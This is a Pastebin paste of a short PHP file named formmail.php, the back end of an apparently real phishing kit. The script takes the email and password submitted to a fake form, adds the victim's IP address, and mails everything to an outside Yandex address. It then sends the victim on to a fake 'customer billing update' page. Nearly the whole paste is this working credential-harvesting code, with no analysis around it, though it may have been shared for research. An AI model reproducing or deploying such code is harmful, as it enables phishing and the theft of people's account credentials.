Advertisement
Demonslay335

formmail.php

Jul 19th, 2019
564
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.47 KB | None | 0 0
  1. <?
  2. $email = $_POST['email'];
  3. $password = $_POST['password'];
  4. $ip = getenv("REMOTE_ADDR");
  5.  
  6. //sending email info here
  7. $subj = "LINK OF EARTH: $ip";
  8. $msg = "--------------------Unleashed By C4SH0UT M45T3R--------------- \n Email: $email\n Password: $password\n------------------\nip: $ip";
  9. $from = "From: Earth<logins@earth.com>";
  10. mail("hondamotto@yandex.com", $subj, $msg, $from);
  11. mail("$cc", $subj, $msg, $from);
  12. header( "Location: Customerbillingupdate.htm");
  13.  
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement